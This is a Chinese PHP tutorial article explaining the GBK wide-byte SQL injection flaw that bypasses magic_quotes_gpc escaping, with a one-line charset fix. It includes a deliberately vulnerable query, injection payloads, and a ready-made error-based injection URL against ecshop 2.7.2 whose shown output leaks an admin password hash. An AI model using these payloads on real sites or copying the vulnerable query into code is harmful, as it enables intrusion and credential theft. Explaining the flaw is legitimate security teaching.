来源:自学PHP网 时间:2015-04-17 11:59 作者: 阅读:次
[导读] php中MYSQL数据库,如果是GBK编码.一定要小心GBK宽字节编码漏洞看代码 test.php文件require_once(lsquo;mysql.phprsquo;);$newdb = new db();$user = $_GET[#39;user#39;];$t = SELECT * FROM use......
|
php中MYSQL数据库,如果是GBK编码.一定要小心GBK宽字节编码漏洞
看代码 test.php文件
require_once(‘mysql.php’);
$newdb = new db();
$user = $_GET['user'];
$t = “SELECT * FROM user WHERE user=’{$user}’”;
$dataRs = $newdb->selects($t);
正常情况下 magic_quote_gpc 为ON,如果输入
http://www.2cto.com /safe/inject.php?user=11′ and 1=2 #
SQL语句就会变成
SELECT * FROM user WHERE user=’1\’ and 1=2 #’
自动加上了\转义,如果构造特殊的宽字节编码呢?
http://www.test.com/safe/inject.php?user=11%df%27 and 1=2 #
SQL语句就变成
SELECT * FROM user WHERE user=’11運’ and 1=2#’
是不是注入上了。
那么11%df会被解析成 11運,而 %27被邪恶的解析成 ‘就绕过了gpc转义,就构造注入了
引用文章:http://www.2cto.com/Article/201207/139595.html
解决办法: http://www.2cto.com/Article/201301/182880.html
把原来的set names gbk 改成
mysql_set_charset(“gbk”, $this->conn);
ecshop 2.7.2 GBK 版本同样有此漏洞。直接
http://www.xx.com/user.php?act=is_registered&username=%ce%27%20and%201=1%20union%20select%201%20and%20%28select%201%20from%28select%20count%28*%29,concat%28%28Select%20concat%280x5b,user_name,0x3a,password,0x5d%29%20FROM%20ecs_admin_user%20limit%200,1%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%20%23
爆出错误
MySQL server error report:Array ( [0] => Array ( [message] => MySQL Query Error ) [1] => Array ( [sql] => SELECT user_id FROM `shop`.`ecs_users` WHERE user_name=’Μ’ and 1=1 union select 1 and (select 1 from(select count(*),concat((Select concat(0x5b,user_name,0x3a,password,0x5d) FROM ecs_admin_user limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) #’ ) [2] => Array ( [error] => Duplicate entry ‘[admin:7fef6171469e80d32c0559f88b377245]1′ for key ‘group_key’ ) [3] => Array ( [errno] => 1062 ) )
把帐号密码爆出来了
|
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com
